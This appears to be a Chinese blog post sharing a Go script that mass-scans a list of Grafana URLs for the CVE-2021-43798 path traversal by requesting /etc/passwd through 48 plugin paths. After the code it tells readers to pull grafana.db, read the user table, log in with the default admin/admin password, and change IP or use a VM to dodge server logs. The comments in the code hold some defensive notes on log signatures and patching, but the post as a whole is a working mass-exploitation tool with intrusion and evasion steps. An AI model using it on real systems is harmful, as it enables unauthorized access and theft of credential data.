【原创】CVE-2021-43798 grafana批量验证脚本

admin 2022年12月3日16:26:11评论21 views字数 2700阅读9分0秒阅读模式

项目地址:https://github.com/light-Life/CVE-2021-43798

用golang简单写的脚本

package main

import (
	"bufio"
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	url2 "net/url"
	"os"
	"strings"
)

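// main reads base URLs from url.txt (one per line), requests every known
// Grafana plugin static path with an encoded traversal suffix appended, and
// records each URL whose response body contains "root:" in test.txt.
//
// Review notes:
//   - Each probe requests /public/plugins/<id>/ followed by a long run of
//     percent-encoded "../" segments. That request shape is what to search
//     for in the Grafana or reverse-proxy access log when checking whether
//     an instance has been probed.
//   - A hit only means the body contained the substring "root:". Any page
//     that happens to contain that text is reported, so treat results as
//     candidates to confirm, not as proof.
//   - A confirmed hit means the instance serves files outside the plugin
//     directory; remediation is upgrading to a fixed Grafana release per the
//     vendor advisory for CVE-2021-43798.
func main() {
	fileOpen, err := os.Open("url.txt")
	if err != nil {
		// Without the input list there is nothing to do. The original went
		// on with a reader wrapping a nil file, whose read error is never
		// io.EOF, so the read loop below never terminated.
		fmt.Println(err)
		return
	}
	defer fileOpen.Close()

	test := []string{
		"/public/plugins/alertGroups/",
		"/public/plugins/alertlist/",
		"/public/plugins/alertmanager/",
		"/public/plugins/annolist/",
		"/public/plugins/barchart/",
		"/public/plugins/bargauge/",
		"/public/plugins/canvas/",
		"/public/plugins/cloudwatch/",
		"/public/plugins/dashboard/",
		"/public/plugins/dashlist/",
		"/public/plugins/debug/",
		"/public/plugins/elasticsearch/",
		"/public/plugins/gauge/",
		"/public/plugins/geomap/",
		"/public/plugins/gettingstarted/",
		"/public/plugins/grafana-azure-monitor-datasource/",
		"/public/plugins/grafana/",
		"/public/plugins/graph/",
		"/public/plugins/graphite/",
		"/public/plugins/heatmap/",
		"/public/plugins/histogram/",
		"/public/plugins/influxdb/",
		"/public/plugins/jaeger/",
		"/public/plugins/live/",
		"/public/plugins/logs/",
		"/public/plugins/loki/",
		"/public/plugins/mixed/",
		"/public/plugins/mssql/",
		"/public/plugins/mysql/",
		"/public/plugins/news/",
		"/public/plugins/nodeGraph/",
		"/public/plugins/opentsdb/",
		"/public/plugins/piechart/",
		"/public/plugins/pluginlist/",
		"/public/plugins/postgres/",
		"/public/plugins/prometheus/",
		"/public/plugins/stat/",
		"/public/plugins/state-timeline/",
		"/public/plugins/status-history/",
		"/public/plugins/table-old/",
		"/public/plugins/table/",
		"/public/plugins/tempo/",
		"/public/plugins/testdata/",
		"/public/plugins/text/",
		"/public/plugins/timeseries/",
		"/public/plugins/welcome/",
		"/public/plugins/xychart/",
		"/public/plugins/zipkin"}

	file, err := os.Create("test.txt") // create (or truncate) the results file
	if err != nil {
		// No results file means findings could not be recorded; stop here
		// instead of failing on every later write.
		fmt.Println(err)
		return
	}
	defer file.Close()

	// Responses come from remote hosts this program does not control, so cap
	// how much of each body is buffered in memory.
	const maxBody = 1 << 20

	// The suffix is identical for every request; build it once.
	suffix := url2.QueryEscape("../../../../../../../../../../../../../../../../../etc/passwd")

	scanner := bufio.NewScanner(fileOpen)
	for scanner.Scan() {
		base := strings.TrimSpace(scanner.Text())
		if base == "" {
			continue // blank lines would only produce malformed requests
		}
		fmt.Println(base)

		// Range over the slice instead of a hard-coded count so the loop
		// stays correct if the list is edited.
		for _, plugin := range test {
			url := base + plugin + suffix
			resp, err := http.Get(url)
			if err != nil {
				// resp is nil when the request fails; skip to the next path
				// so the body is never read through a nil response.
				fmt.Println(err)
				continue
			}
			fmt.Println(resp, url)

			body, err := ioutil.ReadAll(io.LimitReader(resp.Body, maxBody))
			// Close per iteration: a defer here would keep every connection
			// open until main returns.
			resp.Body.Close()
			if err != nil {
				fmt.Println(url, err)
			}

			if strings.Contains(string(body), "root:") {
				fmt.Println("\n\u001B[1;32m[+] 存在漏洞\u001B[0m", url)
				n, err := io.WriteString(file, url+"\n")
				fmt.Println("\n\u001B[1;33m[+] 正在写入\u001B[0m")
				if err != nil {
					fmt.Println(n, err)
				}
				break // one hit per host is enough; move to the next base URL
			}
			fmt.Println("\n\u001B[1;31m[-] 无法识别\u001B[0m", url)
		}
	}
	// Surface read errors other than end-of-file (for example an over-long line).
	if err := scanner.Err(); err != nil {
		fmt.Println(err)
	}
}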

直接go run hello.go运行即可

【原创】CVE-2021-43798 grafana批量验证脚本

验证存在后访问var/lib/grafana/grafana.db

即可下载这个数据库文件打开user的表

【原创】CVE-2021-43798 grafana批量验证脚本

密码是加盐哈希后存储的,一般无法直接破解。加盐是为了防止短密码被彩虹表碰撞出来:盐(salt)是一个随机值,加盐哈希的大致形式类似 md5(md5(passwd)+salt)(此公式仅为通用示意,Grafana 实际使用的算法以其源码为准),密码每多一位,破解难度呈指数上升。

发现 login 为 admin 的账户,密码一般也还是默认的 admin(即默认口令未修改)。

登录进去即可,记得改ip或在虚拟机登录,后台会有详细记录的

【原创】CVE-2021-43798 grafana批量验证脚本

FROM:浅浅淡淡[hellohy]
